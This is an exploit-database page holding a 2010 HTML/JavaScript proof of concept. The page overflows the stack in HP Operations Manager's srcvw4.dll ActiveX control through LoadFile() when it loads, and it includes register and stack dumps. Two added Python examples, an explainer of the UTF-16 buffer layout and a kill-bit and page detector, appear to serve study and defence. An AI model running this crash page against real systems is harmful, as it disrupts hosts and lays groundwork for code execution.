HP Operations Manager 8.16 – 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC)

  • Author: mr_me
    Date: 2010-04-20
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12302/
    <html>
    <!--
    		|------------------------------------------------------------------|
    		| [ Corelan Team ASCII banner ]                                    |
    		| http://www.corelan.be:8800                                       |
    		| security@corelan.be                                              |
    		|-------------------------------------------------[ EIP Hunters ]--|
    
    # HP Operations Manager <= v8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC
    # Found by: mr_me - http://net-ninja.net/
    # Homepage: http://www.hp.com/
    # CVE: CVE-2010-1033
    # Tested on: Windows XP SP3 (IE 6 & 7)
    # Marked safe for scripting: No
    # Module path: C:\Program Files\HP\HP BTO Software\bin\srcvw4.dll
    # HP's Advisory: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02078800
    # Advisory: http://www.corelan.be:8800/advisories.php?id=10-027
    # Greetz: Corelan Security Team
    # http://www.corelan.be:8800/index.php/security/corelan-team-members/
    # ######################################################################################################
    # Notes:
    # - This is a 3rd party library by Tetradyne Inc (not from HP) but HP takes full responsibility
    # - /SafeSEH protected module
    # - The SaveFile() function is also vulnerable to a unicode stack overflow.
    # - Having '\x42' or 'B' as the 2nd byte of nseh will cause us to overwrite the address
    # 	of the seh handler itself and not the contents.
    # - There is simply no code execution on this because there are no unicode-friendly
    # 	ppr's (pop/pop/ret) that I know of. However you could include other components to get code execution.
    # ######################################################################################################
    # Script provided 'as is', without any warranty.
    # Use for educational purposes only.
    # Do not use this code to do anything illegal !
    #
    # Note : you are not allowed to edit/modify this code.
    # If you do, Corelan cannot be held responsible for any damages this may cause.
    
    The Registers:
    
    EAX 002BD012
    ECX 000AEAAA
    EDX 02A90024 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..
    EBX 80070003
    ESP 0013DA1C
    EBP 0013DA70 UNICODE "Could not open file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..
    ESI 02A9258C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..
    EDI 00140000 ASCII "Actx "
    EIP 024DA413 srcvw4.024DA413
    
    The stack:
    
    0013B600   00410041   A.A.   iexplore.00410041
    0013B604   00410041   A.A.   iexplore.00410041
    0013B608   00430043   C.C.   Pointer to next SEH record
    0013B60C   00420042   B.B.   SE handler
    0013B610   00440044   D.D.
    0013B614   00440044   D.D.
    
    And remember, it's better to try and fail than fail to try :-)
    -->
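The register and stack dumps above read more easily once you see what Internet Explorer actually hands the control: the JavaScript string is widened to UTF-16LE, so every ASCII filler character arrives as a 2-byte unit whose high byte is zero, which is why the stack shows 00410041, 00430043 and 00420042 rather than 41414141. The Python below is an added example, not part of mr_me's PoC: it rebuilds the same layout b00m() passes to LoadFile() (1072 'A', then 'CC', 'BB', then 1072 'D'), widens it, reads it back as little-endian DWORDs the way the debugger's stack view does, and checks which 32-bit values such a buffer can produce at all, which is the constraint behind the note that no unicode-friendly pop/pop/ret address is available. The function names and the BUFF_SIZE constant are mine; the buffer contents and the EIP value 0x024DA413 are taken from the page.

```python
# Added example (not part of the PoC): how IE's UTF-16 widening shapes
# what srcvw4.dll sees on the stack, using the exact layout from b00m().
import struct

BUFF_SIZE = 1072  # same value as buffSize in the PoC


def build_layout(buff_size=BUFF_SIZE):
    """The string b00m() passes to LoadFile(): A*1072 + 'CC' + 'BB' + D*1072."""
    return "A" * buff_size + "CC" + "BB" + "D" * buff_size


def widen(text):
    """What the control receives: each ASCII char becomes a 2-byte UTF-16LE unit."""
    return text.encode("utf-16-le")


def dwords(data):
    """Read bytes as little-endian 32-bit values, as a debugger stack view does."""
    return [struct.unpack_from("<I", data, i)[0] for i in range(0, len(data) - 3, 4)]


def find_seh_record(text):
    """Locate the SEH record in the widened buffer.

    Returns (byte offset of the nseh DWORD, nseh value, handler value), or None.
    'CC' widened is 00 43 00 43 -> 0x00430043, matching 'Pointer to next SEH
    record' in the dump; the DWORD after it is the 'SE handler' slot.
    """
    vals = dwords(widen(text))
    for i, v in enumerate(vals):
        if v == 0x00430043:
            return i * 4, v, vals[i + 1]
    return None


def fits_widened_form(value):
    """True if a 32-bit value can be produced by widening two ASCII characters.

    Each 16-bit half must have a zero high byte (00XX00YY). Addresses inside
    srcvw4.dll such as the crashing EIP 0x024DA413 do not fit, which is why
    the author reports no usable unicode-friendly pop/pop/ret handler.
    """
    return value & 0xFF00FF00 == 0


if __name__ == "__main__":
    layout = build_layout()
    print("widened length:", len(widen(layout)), "bytes")
    print("first DWORD   : 0x%08X" % dwords(widen(layout))[0])
    off, nseh, seh = find_seh_record(layout)
    print("SEH record at +%d: nseh=0x%08X handler=0x%08X" % (off, nseh, seh))
    print("0x024DA413 reachable from a widened buffer?", fits_widened_form(0x024DA413))
```

Running it shows the record landing 2144 bytes into the widened buffer (1072 characters times two bytes), exactly the 00430043 / 00420042 pair in the dump, and that only values of the form 00XX00YY can ever be written this way.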
    <object classid='clsid:366C9C52-C402-416B-862D-1464F629CA59' id='boom'></object>
    <script language="JavaScript" defer>
    function b00m()
    {
        var buffSize = 1072;
        var x = unescape("%41");            // 'A' filler placed before the SEH record
        var y = unescape("%44");            // 'D' filler placed after the SEH record
        // 'B' or \x42 as the 2nd byte of nseh will destroy our SEH chain
        var nseh = unescape("%43%43");      // 'CC' -> 00430043 once widened to UTF-16
        var seh = unescape("%42%42");       // 'BB' -> 00420042 once widened to UTF-16
        while (x.length < buffSize) x += x;
        x = x.substring(0, buffSize);
        while (y.length < buffSize) y += y;
        y = y.substring(0, buffSize);
        boom.LoadFile(x + nseh + seh + y);
    }
    </script>
    <body onload="JavaScript: return b00m();">
    <center>
    <p>~ mr_me presents ~</p>
    <p><b>HP Operations Manager &lt;= v8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC</b></p>
    </center>
    </body>
    </html>
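On the defensive side, two questions follow from this advisory: does a captured page instantiate this control, and is Internet Explorer already prevented from loading it? The Python below is an added example, not part of the PoC or of HP's advisory. It scans HTML for an `<object>` tag carrying the CLSID used in the PoC together with LoadFile()/SaveFile() calls, and it parses a `reg export` of Microsoft's ActiveX Compatibility key to report whether the kill bit (Compatibility Flags 0x400, Microsoft's documented mechanism for blocking a control in IE) is set for that CLSID. The sample page and registry text are constructed; the CLSID is the one from the page; the function names are mine.

```python
# Added example (not from the PoC or HP): triage helpers for this advisory.
import re

# CLSID exactly as used in the PoC's <object> tag
SRCVW4_CLSID = "366C9C52-C402-416B-862D-1464F629CA59"

# Microsoft's ActiveX kill-bit location: setting bit 0x400 in the
# "Compatibility Flags" DWORD under this key stops IE from loading the control.
ACTIVEX_COMPAT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
KILL_BIT = 0x400

_OBJECT_RE = re.compile(
    r"""<object\b[^>]*\bclassid\s*=\s*["']?\s*clsid:([0-9A-Fa-f-]{36})""", re.I)
_METHOD_RE = re.compile(r"\.(LoadFile|SaveFile)\s*\(", re.I)


def find_control_usage(html):
    """Return the vulnerable methods called on the control (sorted, possibly
    empty), or None if the page never instantiates the srcvw4.dll CLSID."""
    if not any(m.group(1).upper() == SRCVW4_CLSID for m in _OBJECT_RE.finditer(html)):
        return None
    return sorted({m.group(1) for m in _METHOD_RE.finditer(html)})


def kill_bit_set(reg_export, clsid=SRCVW4_CLSID):
    """Parse decoded 'reg export' text and report whether the kill bit is set
    for clsid. Keys are compared case-insensitively, as the registry does."""
    wanted = f"[{ACTIVEX_COMPAT_KEY}\\{{{clsid}}}]".lower()
    in_key = False
    for line in reg_export.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_key = line.lower() == wanted
        elif in_key and line.lower().startswith('"compatibility flags"=dword:'):
            flags = int(line.lower().split("dword:", 1)[1], 16)
            return flags & KILL_BIT == KILL_BIT
    return False


# Constructed sample page modelled on the PoC (not captured from a real incident).
SAMPLE_HTML = """<html>
<object classid='clsid:366C9C52-C402-416B-862D-1464F629CA59' id='boom'></object>
<script>function b00m(){ var x='A'; while(x.length<1072) x+=x; boom.LoadFile(x); }</script>
<body onload='b00m()'></body></html>"""

# Constructed 'reg export' output (already decoded from UTF-16) with the kill bit set.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{366C9C52-C402-416B-862D-1464F629CA59}]
"Compatibility Flags"=dword:00000400
"""

if __name__ == "__main__":
    print("methods called on the control:", find_control_usage(SAMPLE_HTML))
    print("kill bit set for the control :", kill_bit_set(SAMPLE_REG))
```

A real `reg export` writes UTF-16LE with a BOM, so decode the file before passing it in; a host where the key is absent, or where the flag lacks bit 0x400, is reported as not protected.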